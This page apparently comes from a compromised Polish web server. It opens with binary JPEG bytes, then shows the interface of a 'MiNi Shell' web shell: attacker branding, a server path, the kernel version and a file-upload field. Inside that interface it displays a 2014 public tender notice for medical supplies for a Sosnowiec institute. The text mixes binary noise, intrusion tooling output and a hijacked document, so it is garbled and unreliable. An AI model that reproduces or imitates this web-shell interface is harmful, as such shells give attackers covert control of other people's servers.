JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140723/246576-N-2014.html

<p class="kh_header"><b>Sosnowiec: Sukcesywna dostawa materiałów medycznych dla  Instytutu Medycyny Pracy i Zdrowia Środowiskowego w Sosnowcu</b><br>
<b>Numer ogłoszenia: 246576 - 2014; data zamieszczenia: 23.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Medycyny Pracy i Zdrowia Środowiskowego , ul. Kościelna 13, 41-200 Sosnowiec, woj. śląskie, tel. 032 2660885, faks 032 2661124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.imp.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa materiałów medycznych dla  Instytutu Medycyny Pracy i Zdrowia Środowiskowego w Sosnowcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet 1			
L.p.	Asortyment	Numer katalog.	Zapotrzebowanie na 24 miesiące 	Oferowane opakowanie jednostkowe
1	basen z tworzywa	 	12	szt
2	kaczka męska z tworzywa	 	20	szt
3	drewniane kwacze do wymazów pojedynczo pakowane -sterylne	 	1800	szt
4	ochrona na buty a100szt	 	150	op
5	okulary ochronne	 	30	szt.
6	2-2,5l słoje na dobową zbiórkę moczu z podziałką co 100ml	 	30	szt.
7	staza automatyczna	 	50	szt.
8	szpatułki drewniane a100szt	 	12	op.
9	Identyfikator plastikowy na rękę x 100szt	 	30	op
10	Jednorazowy, antybakteryjny czepek do bezwodnego  nasączony substancjami myjącymi oraz odżywką.Nie wymagający namoczenia oraz spłukiwania.Pojedynczo pakowane , z możliwością podgrzania w mikrofalówce.	 	120	szt
11	Jednorazowa szczoteczka do zębów wykonana z polipropylenu z możliwością  odsysania. Z jednej strony  pokryta miękkim włosiem z drugiej gąbką. Otwór odsysający zarówno od strony włosia jak i w przestrzeni między gąbką i włosiem. Pojedynczo pakowane	 	500	szt
				
12	Jednorazowy aplikator gąbkowy do nawilżania jamy ustnej.Uchwyt wykonany z poliestru, gąbka wykonana z polipropylenu.Pakowany pojedynczo.	 	800	szt
13	Jednorazowa myjka do mycia ciała w formie rękawicy , obustronnie nasączona środkiem myjącym o naturalnym Ph.Rozmiar 15-16/22-25mm, czystość mikrobiologiczna potwierdzona badaniami nie starszymi niż 2013r na brak zawartości Pseudomonas aeruginosa, Caandida albicans, Staphylococus aureus oraz Escherichia coli.Op.20szt/ lub z przelicznikiem	 	400	szt
Pakiet 2			
L.p.	Asortyment	Numer katalog.	Zapotrzebowanie na 24 mies.	Oferowane opakowanie jednostkowe
				
1.             	błony niebieskoświecące do rtg 35 x 43 cm a100szt	 	80	op.
2.             	błony niebieskoświecące do rtg 13x18 cm  a100szt	 	4	op.
3.             	błony niebieskoświecące do rtg 35x35 cm a100szt	 	35	op.
4.             	błony niebieskoświecące do rtg 24 x 30 cm a100szt	 	35	op.
5.             	błony niebieskoświecące do rtg 18 x 24 cm a100szt	 	25	op.
6.             	koperty do rtg 35,6 x 43,5	 	4000	szt.
7.             	koperty do rtg 18 x 24 cm	 	1500	szt.
8.             	koperty do rtg 35 x35 cm	 	500	szt.
9.             	koperty do rtg 24x30 cm	 	1000	szt.
10.           	odczynniki utrwalacz 	 	15	(2x20l roztworu)
11.           	odczynniki wywoływacz 	 	15	(2x20l roztworu)
12.           	odczynniki starter 1 litr	 	2	szt.


Pakiet 3			
L.p.	Asortyment	Numer katalog.	Zapotrzebowanie na 24 miesiące 	Oferowane opakowanie jednostkowe
1	elektroda do EKG na bazie gąbki, żel stały, o śr.43mm, ze złączem zatrzaskowym op50szt	 	200	op
2	elektroda do EKG na bazie gąbki PE, żel stały, o wym. 22,5mm/46mm, ze złączem zatrzaskowym op50szt	 	14	op
				
				
				
3	papier do EKG AsCardMr.Blue - wymiar - szerokość - 112 mm.	 	400	rolki


Pakiet 4		
			
L.p.	Asortyment	Numer katalog.	Zapotrzebowanie na 24 mies.	Oferowane opakowanie jednostkowe
1	Rękawica winylowa, bezpudrowa, uniwersalny kształt, pasująca na prawą i lewą dłoń, długość 240mm, grubość palca 0,09 mm, dłoni 0,08mm mankietu 0,05mm, AQL 1,5, rozmiar XS-XL, zgodność z normą EN 455 -1-4, EN 374 1-2. pakowane po 100 szt.	 	700,00	op.
2	Rękawica lateksowa, pudrowana o uniwersalnym kształcie. Długość 240 mm, grubość dłoni minimum 0,11 mm, palca 0,13mm, mankiet 0,08mm. Proteiny max 60 ug/g, AQL 1,5. Zgodne z normą EN 455 1-4 i EN 374 1-2. Dostępne w rozmiarach XS-XL, pakowane po 100 sztuk.	 	600,00	op.
3	Rękawice diagnostyczne lateksowe bezpudrowe niejałowe, z wewnętrzną warstwą polimeryzowaną, długość 240 mm, min. grubość na palcu 0,12mm, części dłoniowej 0,11mm, na mankiecie 0,08mm, teksturowane, AQL 1.5, zawartość protein poniżej 30 ug/g, zarejestrowane w klasie I Wyrobów Medycznych zgodnie z Dyrektywą Medyczną 93/42/EEC, zgodne z wymaganiami normy EN 455-części 1, 2, 3 i 4,zgodność potwierdzona Certyfikatem Jednostki Notyfikowanej,  oraz normy EN 374 - części 1, 2, oznakowane jako produkt medyczny i środek ochrony indywidualnej ( Medical 93/42/EEC i PPE 89/686 cat. I), odpowiednie do kontaktu z żywnością. Pakowane po 100 szt.	 	800,00	op.
4	Rękawica diagnostyczna, lateksowa, bezpudrowa, dostępna w rozmiarach XS-XL, mankiet rolowany, grubość palca 0,12mm, dłoni 0,11 mm, mankietu 0,08mm, całkowita dł. 240mm. AQL 1,5, zawartość protein max.50 ug/g,  zgodność z normą EN 455 1-4, EN 374 1-2.  Pakowane po 100 szt.	 	380,00	op.
5	Rękawica lateksowa, wzmocniona, bezpudrowa w kolorze ciemno niebieskim, o uniwersalnym kształcie, pasująca na prawą i lewą dłoń. Długość 295 mm, grubość palca 0,34 mm, dłoni 0,33.  ALQ 1,5, proteiny max 40 ug/g, Zgodne z normą EN 455 1-4, EN 374 1-2. Pakowane po 50 sztuk, dostępne w rozmiarach S-XL.	 	20,00	op.

Pakiet 5 			
L.p.	Asortyment	Numer katalog.	Zapotrzebowanie roczne	Oferowane opakowanie jednostkowe
1.	Pojemnik wielorazowego użytku, na wkłady workowe, wykonany z przeźroczystego poliwęglanu, skalowany, wyposażony w zintegrowany zaczep do mocowania oraz króciec obrotowy typu schodkowego, podłączony do źródła próżni na stałe, z możliwością sterylizacji w temp. 121C, poj 2000ml.	 	12	szt.
2.	Pojemnik wielorazowego użytku, na wkłady workowe, wykonany z przeźroczystego poliwęglanu, skalowany, o spłaszczonym kształcie, wyposażony w zintegrowany zaczep do mocowania oraz króciec obrotowy typu schodkowego, podłączony do źródła próżni na stałe, z możliwością sterylizacji w temp. 121C, poj 1000ml.	 	10	szt.
3.	Jednorazowy wkład workowy na wydzieliny, z trwale dołączoną pokrywą o spłaszczonym kształcie, do pojemników typu Serres, uszczelniony automatycznie po uruchomieniu ssania, bez konieczności wciskania go w pojemnik, z zastawką zapobiegającą wypływowi wydzieliny do źródła próżni, posiadający w pokrywie jeden obrotowy króciec przyłączeniowy typu schodkowego o śr.wewn. min.7mm, z opcją ortopedyczną o śr. wewn. min. 12mm oraz szerokim portem w pokrywie do pobierania próbek, nie zawiera PVC. Sprasowany, ułatwia magazynowanie., poj. 1000ml.	 	200	szt.
4.	Jednorazowy wkład workowy na wydzieliny, z trwale dołączoną pokrywą do pojemników typu Serres, uszczelniony automatycznie po uruchomieniu ssania, bez konieczności wciskania go w pojemnik, z zastawką zapobiegającą wypływowi wydzieliny do źródła próżni, posiadający w pokrywie jeden obrotowy króciec przyłączeniowy typu schodkowego o śr.wewn. min.7mm, z opcją ortopedyczną o śr. wewn. min. 12mm oraz szerokim portem w pokrywie do pobierania próbek, nie zawiera PVC. Sprasowany, ułatwia magazynowanie., poj. 2000ml.	 	600	szt.
5.	Filtr do próżni przeciwbakteryjny i przeciwwirusowy o skuteczności filtracji 99,999% hydrofobowy średnica wewnętrzna 5,5mm, zewnetrzna 7,5 	 	100	szt.
6.	Filtr mechaniczny hydrofobowy maszynowy stosowany przy respiratorze, skuteczność filtracji w środowisku wilgotnym i w płynach: 100 objętość 90ml, opór przepływu 2cm H2O/60L/min, czas stosowania 24godz., jednorazowego użytku	 	10	szt
7.	Dren ssący silikonowy dł.2m	 	5	szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie potwierdzające wiarygodność oferenta na podstawie art. 22 ust. 1, 
          na formularzu stanowiącym załącznik nr 5 do niniejszej specyfikacji</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Aktualny dokument potwierdzający dopuszczenie do obrotu i do używania zgodnie z ustawą z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. z 2010 r. Nr 107, poz. 679 - tzn: deklaracja zgodności i/lub certyfikat zgodności (certyfikat zgodności wydany przez jednostkę notyfikowaną)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje możliwość zmian zapisów umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.imp.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W Sekretariacie Głównym IMPiZŚ, pok.103, ul. Kościelna 13, Sosnowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2014 godzina 10:00, miejsce: W Sekretariacie Głównym IMPiZŚ, pok.103, ul. Kościelna 13, Sosnowiec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com